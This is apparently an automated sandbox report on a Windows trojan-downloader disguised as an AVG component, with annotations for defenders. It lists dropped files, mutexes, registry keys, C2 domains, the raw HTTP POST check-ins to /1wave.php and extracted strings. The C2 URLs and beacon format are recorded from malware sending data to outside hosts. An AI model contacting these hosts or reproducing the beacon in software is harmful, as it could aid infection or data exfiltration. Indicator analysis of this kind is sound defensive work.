Analysis Date: 2014-01-12 23:42:31
MD5: d2700f92b96f9b54610e945e1a108f97
SHA1: 42a5dc5fadfb833a3cdb0ce624267e533d07122b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a7c2c0b0bf4257f59129a3499dc41fd4 sha1: 7cc6945796465cbaf8db170f05f9fcde2aca0fb4 size: 12288
Section .rdata md5: 25d2cf3a0676927528da8e1bebe0b9ab sha1: ef9577fc362a546d809564254957175ff668679c size: 2560
Section .data md5: 488b9d94444a557b64e5fc433c60788c sha1: 19e1e6e84762c8662dddae32b71c2ce46c60afcd size: 102912 (note: .data is roughly eight times the size of .text, consistent with a packed/crypted payload as the Win32/Cryptor detection below suggests)
Section .rsrc md5: 97c035d08782b925f88d8d9752cee0de sha1: bcafb971856a7801c1aa0543d6324e94c9f6d102 size: 4608
Timestamp: 2009-09-10 05:56:31 (PE compile timestamp; it predates the 2010 copyright and build dates claimed in the version resource below, so the version information is likely forged)
Version: LegalCopyright: Copyright © 2010 q3 AVG Technologies CZ, s.r.o.s
InternalName: SWav_g_amrpv
FileVersion: 9.0.0.832
CompanyName: AVG Technologies CZ, s.r.o.
PrivateBuild: Win32 Release_Unicode
ProductName: AVG Internet Security 4i
SpecialBuild: Avg8VC84i_2010_0603_213001(832), SVNRev 132525ER (/branches/release/avg90_sp3)
ProductVersion: 9.0.0.832
FileDescription: A AVG Alert Manager
OriginalFilename: SWav_g_amrpv
(note: these fields mimic an AVG Alert Manager binary but contain inserted garbage — the stray "q3", the trailing "s" on the copyright, "4i", "A AVG" — and the InternalName/OriginalFilename are random strings; treat the version resource as spoofed and verify provenance via an Authenticode signature check rather than these strings)
PEhash: 1591af960c93ea1d8dfe4efcd6d34f31f858ad23
AV (avg): Win32/Cryptor
AV (mcafee): Downloader-CEW.ai

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\Ojawia.exe
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates Process: C:\WINDOWS\Ojawia.exe
Creates Mutex: Global\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}
(note: the sample drops and launches C:\WINDOWS\Ojawia.exe and writes a scheduled-task .job file; the dropped path, the task GUID and the mutex GUID — which the child process re-creates below — are the host IOCs to collect from this stage)

Process
↳ C:\WINDOWS\Ojawia.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL (the "\x03" is most likely the sandbox's rendering of the Internet-zone subkey "3"; value 1601 is the IE "Submit non-encrypted form data" URL action, a setting malware commonly flips to suppress that prompt — the recorded data is NULL here, so confirm the value actually written before relying on it)
Registry: HKEY_CURRENT_USER\Software\2SPI9KEA4C\OhuD ➝
5 (random-looking key under HKCU\Software, likely an install/state marker; usable as a host IOC if it proves stable across samples)
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\WINDOWS\Tasks\{62C40AA6-4406-467a-A5A5-DFDF1B559B7A}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{C814BC71-BD20-47f7-8107-9BCB142C6F1C}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
(note: the .job file is created and then deleted again within this trace, so scheduled-task persistence cannot be assumed from the sandbox run alone — check whether the task survives on a longer run; the index.dat files, WininetConnectionMutex and the "c:!…!" mutexes appear to be standard WinINet side effects of the HTTP POSTs below rather than malware-specific indicators)

Network Details:

DNS: ameba.jp (this and wretch.cc below are legitimate public sites, likely resolved as a connectivity check before the C2 domains; confirm against the pcap before treating them as indicators)
Type: A
180.233.142.60
DNS: wretch.cc
Type: A
68.180.206.184
DNS: wretch.cc
Type: A
98.139.102.145
DNS: wretch.cc
Type: A
106.10.165.51
DNS: wretch.cc
Type: A
77.238.178.122
DNS: wretch.cc
Type: A
87.248.120.148
DNS: baqwi.com
Type: A
69.43.161.169
DNS: buyitave.com
Type: A
208.73.211.247
DNS: topjer.com (no address is recorded for this query in the report — the domain was queried but apparently did not resolve at analysis time; keep it in the domain IOC list regardless)
Type: A
HTTP POST: http://baqwi.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://buyitave.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
(note: both POSTs carry the identical 305-byte application/x-www-form-urlencoded body "data=e/e6r5JZR10F…" shown in the raw pcap below, which suggests a static encoded/encrypted check-in rather than per-request data; the User-Agent advertises Windows NT 5.0 although the host is an XP-style C:\WINDOWS install, so the string is hard-coded and, together with the /1wave.php path and Cache-Control: no-cache header, makes a usable network signature)
Flows TCP: 192.168.1.1:1031 ➝ 69.43.161.169:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.247:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206261   ncoded..Host: ba
0x00000060 (00096)   7177692e 636f6d0d 0a557365 722d4167   qwi.com..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000090 (00144)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000a0 (00160)   4e542035 2e30290d 0a436f6e 74656e74   NT 5.0)..Content
0x000000b0 (00176)   2d4c656e 6774683a 20333035 0d0a436f   -Length: 305..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000d0 (00208)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000e0 (00224)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x000000f0 (00240)   3d652f65 3672354a 5a523130 4669776f   =e/e6r5JZR10Fiwo
0x00000100 (00256)   474c6735 31516743 39686e62 45786f32   GLg51QgC9hnbExo2
0x00000110 (00272)   31617433 614f5967 73552f48 4c6b7a66   1at3aOYgsU/HLkzf
0x00000120 (00288)   33637577 70447452 7379352b 65305a5a   3cuwpDtRsy5+e0ZZ
0x00000130 (00304)   5237336c 4558787a 38543235 61367833   R73lEXxz8T25a6x3
0x00000140 (00320)   30656463 7364774d 4a4f6441 462f566a   0edcsdwMJOdAF/Vj
0x00000150 (00336)   56735748 46304579 377a444a 57392f73   VsWHF0Ey7zDJW9/s
0x00000160 (00352)   394a4572 4a307066 72383251 59366238   9JErJ0pfr82QY6b8
0x00000170 (00368)   48436753 754e6155 71696734 6f563342   HCgSuNaUqig4oV3B
0x00000180 (00384)   42774b32 74327a37 33524765 7955446a   BwK2t2z73RGeyUDj
0x00000190 (00400)   67737548 4670434c 4f696b52 50534c39   gsuHFpCLOikRPSL9
0x000001a0 (00416)   536a7550 31494238 624b706a 746d4a30   SjuP1IB8bKpjtmJ0
0x000001b0 (00432)   69673356 6d566346 38616f4f 72425252   ig3VmVcF8aoOrBRR
0x000001c0 (00448)   43796462 4b50674f 69452f6b 7a6a674d   CydbKPgOiE/kzjgM
0x000001d0 (00464)   76414543 6d564362 664b724e 6536576c   vAECmVCbfKrNe6Wl
0x000001e0 (00480)   4867686b 45546a2f 6b477638 46363055   HghkETj/kGv8F60U
0x000001f0 (00496)   52444d50 686e3470 64494144 71467842   RDMPhn4pdIADqFxB
0x00000200 (00512)   482f3476 4f384572 68676c32 55597753   H/4vO8Erhgl2UYwS
0x00000210 (00528)   6c657234 4d437830 79415a34 44         ler4MCx0yAZ4D

0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206275   ncoded..Host: bu
0x00000060 (00096)   79697461 76652e63 6f6d0d0a 55736572   yitave.com..User
0x00000070 (00112)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000080 (00128)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000090 (00144)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000a0 (00160)   7773204e 5420352e 30290d0a 436f6e74   ws NT 5.0)..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3330350d   ent-Length: 305.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x000000d0 (00208)   73650d0a 43616368 652d436f 6e74726f   se..Cache-Contro
0x000000e0 (00224)   6c3a206e 6f2d6361 6368650d 0a0d0a64   l: no-cache....d
0x000000f0 (00240)   6174613d 652f6536 72354a5a 52313046   ata=e/e6r5JZR10F
0x00000100 (00256)   69776f47 4c673531 51674339 686e6245   iwoGLg51QgC9hnbE
0x00000110 (00272)   786f3231 61743361 4f596773 552f484c   xo21at3aOYgsU/HL
0x00000120 (00288)   6b7a6633 63757770 44745273 79352b65   kzf3cuwpDtRsy5+e
0x00000130 (00304)   305a5a52 37336c45 58787a38 54323561   0ZZR73lEXxz8T25a
0x00000140 (00320)   36783330 65646373 64774d4a 4f644146   6x30edcsdwMJOdAF
0x00000150 (00336)   2f566a56 73574846 30457937 7a444a57   /VjVsWHF0Ey7zDJW
0x00000160 (00352)   392f7339 4a45724a 30706672 38325159   9/s9JErJ0pfr82QY
0x00000170 (00368)   36623848 43675375 4e615571 6967346f   6b8HCgSuNaUqig4o
0x00000180 (00384)   56334242 774b3274 327a3733 52476579   V3BBwK2t2z73RGey
0x00000190 (00400)   55446a67 73754846 70434c4f 696b5250   UDjgsuHFpCLOikRP
0x000001a0 (00416)   534c3953 6a755031 49423862 4b706a74   SL9SjuP1IB8bKpjt
0x000001b0 (00432)   6d4a3069 6733566d 56634638 616f4f72   mJ0ig3VmVcF8aoOr
0x000001c0 (00448)   42525243 7964624b 50674f69 452f6b7a   BRRCydbKPgOiE/kz
0x000001d0 (00464)   6a674d76 4145436d 56436266 4b724e65   jgMvAECmVCbfKrNe
0x000001e0 (00480)   36576c48 67686b45 546a2f6b 47763846   6WlHghkETj/kGv8F
0x000001f0 (00496)   36305552 444d5068 6e347064 49414471   60URDMPhn4pdIADq
0x00000200 (00512)   46784248 2f34764f 38457268 676c3255   FxBH/4vO8Erhgl2U
0x00000210 (00528)   5977536c 6572344d 43783079 415a3444   YwSler4MCx0yAZ4D
0x00000220 (00544)                                         


Strings (note: DVCLAL and the "List index out of bounds"/"Stream read error"/"Invalid property path" messages are Delphi RTL artifacts, which do not match the "Win32 Release_Unicode"/VC84 build claimed in the version resource — further evidence that the version info was copied from a genuine AVG file; the small .text section together with VirtualAlloc/IsBadReadPtr imports is consistent with an unpacking stub, so the strings below describe the packer, not the payload)
040504b0
 2010 q3 AVG Technologies CZ, s.r.o.s
9.0.0.832
A AVG Alert Manager
Avg8VC84i_2010_0603_213001(832), SVNRev 132525ER (/branches/release/avg90_sp3)
AVG Internet Security 4i
AVG Technologies CZ, s.r.o.
BBABORT
biS2
Cannot open file "%s". %s
CompanyName
Copyright 
DVCLAL
Error reading %s%s%s: %s
Failed to get data for '%s'
FileDescription
FileVersion
InternalName
Invalid argument to date encode
Invalid argument to time encode
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid property element: %s
Invalid property path
Invalid property type: %s
Invalid property value
Invalid stream format$''%s'' is not a valid component name
LegalCopyright
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters!'%s' is not a valid integer value('%s' is not a valid floating point value
OriginalFilename
Out of memory
PrivateBuild
ProductName
ProductVersion
Property is read-only
Property %s does not exist
PvhN
Resource %s not found
SpecialBuild
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Stream read error
Stream write error
StringFileInfo
SWav_g_amrpv
TEXTFILEDLG
Translation
VarFileInfo
VS_VERSION_INFO
Win32 Release_Unicode
XcxS
),0Eb[
0eeEFD5eM7wt
0M0-%M
|0Mp@X.|
0u44@R
1s7>9:$#
1s7{p7
1yC}XQ
{2PsKk
2q64>b
}2tDo[
33333333?333333
333333333333333333
3333333333333338
3333339
333338
33333833
333838
3a:aPe
	3KjeN
3:(oYp
4oMQ}Z
577gCY2
5C5j53F
5mcV6(
5Q3u	>p
6&#3ub 
_6KcDP
\75Z_V
[_^7RIpK
'9~`7A
9Biav8
9vP	dTd
aGSAQqaZ9
ap6J2ye3TO
B7E[KN
BEIPQDB
bImgIh
bqe8I1
c?+f!B
(c-$HmF
CopyEnhMetaFileA
`]cQm_
@.data
DNM-7}
DrawMenuBar
e[m{1}
EnableWindow
EqualRect
ExitProcess
e*XW	^B
=[-|F{7
[FdU	[#I
FHah_:Z
FillRect
FindWindowA
Fq3318
Fx)q77VSW
GDI32.dll
GetCommandLineW
GetCurrentProcess
GetCurrentThread
GetCursor
GetDCOrgEx
GetMenuItemCount
GetModuleHandleW
GetTextColor
GetTopWindow
GetV9r
GetWindow
g+ln<N
_g&R^e
GskV8wuE3
GuJ1^O
h`hElc
h;hW{m
H&^Mv+~y
^ HSjA
I3&z1*0
i5OfNd
I=8fgA=
^ia6}"
?iBy7e
IsBadReadPtr
IvI~SO
i%[>v%V
IXBadC
j0?|	]
:J]0Sj
j&&4	[j
'jA5z'
{ jD2bs%O
-;j$iW
Jo2^Fo2
jOhH'`3
JpI20yUV
'`jWgi
j,{z":
kernel32.dll
K=*;_r
Kz}j:}l
#l$I(j
(Ll_;0ti
LoadBitmapA
LoadCursorA
L/%	Xy
M4-Af';
M6]M0,MU
miNZ7V
^MkA|{
{'M^Q@N
|mVE]Yc
mW}UJ#_
^	)~'N
N0cdqw
n2d[$G
N!(H:Z9]
NU][m6
=nywLH
o~)130wR
O2p+4l
OLEAUTn
out_Qf
p7;7w~Y
pi0rHpd
pm*:3W~ 	
Pr7cAd<
puT1a\]`
QAE<XZ
qaH1	H
qf{]mC
q^mF,N
`.rdata
`.rdatI
.=Rj'0
Rv=MbP
}RWN^O
(+-</S
s(3=$a@
s +5\a@
_[s6kvt
shell32.dll
Shell_NotifyIconW
SHFileOperationA
SHGetDiskFreeSpaceA
SHGetSpecialFolderLocation
Sj	*LV
SWav_g_amrpv
t77-n[a
tC}8L-
.tc -Y
Tfr4MB
!This program cannot be run in DOS mode.
T!PKx^d
u|	!&	
u2iMo2
{UhgN8] 
UNIQSTR
user32.dll
v23zSNj
V4<*M$Ti
VCUHWyIc
Vi9hUfQ
VirtualAlloc
V??QHnc
vZ8]u_$+
Vz"KuGfIL
)w4X=w)
WJ+[;(
W&!OZ;
W\\<p\1
~W;QB^Q`
WQ=G?	
:;WR~^
WS!	KtF
W#VZP$~
XNPc,XNxc@XN
	.x NtEM
XOk7@zq
[yClaW
Y*$E,M
,YvuI9
Z0EMVd
Zd/.eWU
ZtBaQw[$A
ZtlD?v
Zt{p@?[
z	Y#5V